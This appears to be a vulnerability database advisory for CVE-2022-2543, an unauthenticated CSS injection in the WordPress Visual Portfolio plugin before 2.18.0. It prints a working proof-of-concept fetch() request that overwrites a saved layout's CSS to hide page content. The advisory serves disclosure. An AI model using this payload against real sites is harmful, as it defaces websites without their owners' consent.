Lucene search
Krzysztof ZającWPEX-ID:5DC8B671-F2FA-47BE-8664-9005C4FDBEA8HistoryAug 15, 2022 - 12:00 a.m.
Visual Portfolio < 2.18.0 - Unauthenticated CSS Injection
2022-08-1500:00:00
Krzysztof Zając
130
0.001 Low
EPSS
Percentile
41.1%
The plugin does not have proper authorisation checks in some of its REST endpoints, allowing unauthenticated users to call them and inject arbitrary CSS in arbitrary saved layouts
The post_id is the ID of a saved layout
fetch('/?rest_route=/visual-portfolio/v1/update_layout&post_id=8&data[vp_custom_css]=body{background-image:url(data://image/gif;base64,R0lGODdhKAAoAIABAAAAAP///ywAAAAAKAAoAAACX4yPqcvtD6OctNqLs968GwB4DkheJUSeUxqObCu98CJTtZvaL6quucjoAYfEovGI9M2MrJjwccM9G9FglXpVyJa0LW9n9X635Gy4jOZK02YoW1x5NzNytYWdzOv3/GIBADs=);}div{display:none !important};', {
method: 'POST',
}).then(response => response.text())
.then(data => console.log(data));
Related
prion
prion
Design/Logic Flaw
2022-09-05 13:15:00
patchstack
patchstack
wpvulndb
wpvulndb
Visual Portfolio < 2.18.0 - Unauthenticated CSS Injection
2022-08-15 00:00:00
cve
cve
CVE-2022-2543
2022-09-05 13:15:08
nvd
nvd
CVE-2022-2543
2022-09-05 13:15:08
cvelist
cvelist
CVE-2022-2543 Visual Portfolio < 2.18.0 - Unauthenticated CSS Injection
2022-09-05 12:35:20